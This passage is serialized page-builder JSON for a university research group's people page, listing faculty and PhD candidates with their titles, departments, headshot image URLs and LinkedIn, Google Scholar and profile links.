13:20:33','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1697,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-Portrait-1-e1697202215204.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1701,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-SRM-360x360-1-e1697143162762.png\",\"caption\":{\"text\":\"\"},\"imageId\":1670,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-zelikovsky-e1697143252884-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1673,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-bourgeois-e1697143389924.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1675,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/cropped-cropped-hu_new-1-e1697143455517.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1677,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-cropped-patterson-e1697143515399.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1679,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Taylor-shelton_300x300-e1697143561739.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1681,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c58\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c59\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-Hassan-Babaie-300x300-1-e1697143646400.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1682,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c60\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":2,\"id\":\"182-c61\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c62\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c63\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c66\",\"parentId\":\"182-c65\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c65\",\"parentId\":\"182-c64\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c64\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c69\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c70\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1659,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c71\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c69\",\"index\":2,\"id\":\"182-c72\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c69\",\"index\":3,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c69\",\"index\":1,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-IMG_1240-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1336,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c75\",\"index\":3,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Emma.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":966,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c85\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/anupam.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1624,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD 